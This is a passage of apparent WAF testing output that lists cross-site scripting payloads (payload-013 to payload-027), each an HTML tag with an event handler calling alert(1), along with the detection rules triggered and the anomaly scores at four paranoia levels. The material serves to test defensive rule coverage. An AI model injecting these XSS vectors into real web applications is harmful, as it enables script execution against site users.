942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 51
****** payload-013 ********
Payload:
payload=<audio oncanplay=alert(1)><source src=&quot;validaudio.wav&quot; type=&quot;audio/wav&quot;></audio></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
Total Incoming Score: 25
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 77
****** payload-014 ********
Payload:
payload=<video oncanplaythrough=alert(1)><source src=&quot;validvideo.mp4&quot; type=&quot;video/mp4&quot;></video></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
Total Incoming Score: 25
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 77
****** payload-015 ********
Payload:
payload=<a id=x tabindex=1 ondeactivate=alert(1)></a><input id=y autofocus></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 23
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 39
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 52
****** payload-016 ********
Payload:
payload=<svg><animate onend=alert(1) attributeName=x dur=1s></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 28
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 41
****** payload-017 ********
Payload:
payload=<audio controls autoplay onended=alert(1)><source src=&quot;validaudio.wav&quot; type=&quot;audio/wav&quot;></audio></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
Total Incoming Score: 25
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 77
****** payload-018 ********
Payload:
payload=<audio src/onerror=alert(1)></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
****** payload-019 ********
Payload:
payload=<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 38
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 51
****** payload-020 ********
Payload:
payload=<a id=x tabindex=1 onfocus=alert(1)></a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
****** payload-021 ********
Payload:
payload=<a id=x tabindex=1 onfocusin=alert(1)></a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
****** payload-022 ********
Payload:
payload=<a onfocusout=alert(1) tabindex=1 id=x></a><input autofocus></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 23
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
****** payload-023 ********
Payload:
payload=<body onhashchange=&quot;alert(1)&quot;></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
Total Incoming Score: 30
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 59
****** payload-024 ********
Payload:
payload=<svg><a onload=alert(1)></a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
****** payload-025 ********
Payload:
payload=<audio onloadeddata=alert(1)><source src=&quot;validaudio.wav&quot; type=&quot;audio/wav&quot;></audio></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 30
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 46
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 82
****** payload-026 ********
Payload:
payload=<audio autoplay onloadedmetadata=alert(1)> <source src=&quot;validaudio.wav&quot; type=&quot;audio/wav&quot;></audio></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 30
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 49
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 85
****** payload-027 ********
Payload:
payload=<img src=validimage.png onloadend=alert(1)></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
